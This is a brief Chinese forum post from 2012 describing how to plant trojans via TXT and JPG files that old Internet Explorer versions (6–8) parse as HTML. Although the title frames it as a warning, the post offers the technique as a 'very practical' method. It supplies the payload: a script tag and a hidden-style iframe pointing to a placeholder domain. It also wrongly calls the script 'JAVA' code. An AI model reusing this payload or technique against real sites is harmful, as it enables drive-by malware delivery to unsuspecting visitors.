谨防IIS解析漏洞的txt文件和jpg图片挂马

[复制链接]
查看1369 | 回复0 | 2012-4-1 19:28:00 | 显示全部楼层 |阅读模式
很少见但非常实用的TXT文件挂马方法:
TXT文件中插入一段JAVA代码后后边的HTML代码就会被IE执行,受影响版本IE678。
代码:
<script>alert(sb)</script>
<iframe src=http://域名 width=500 height=500></iframe>
图片挂马:将上述代码保存为JPG文件,然后通过IE访问,IE还是同样会解析图片中的HTML代码。
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则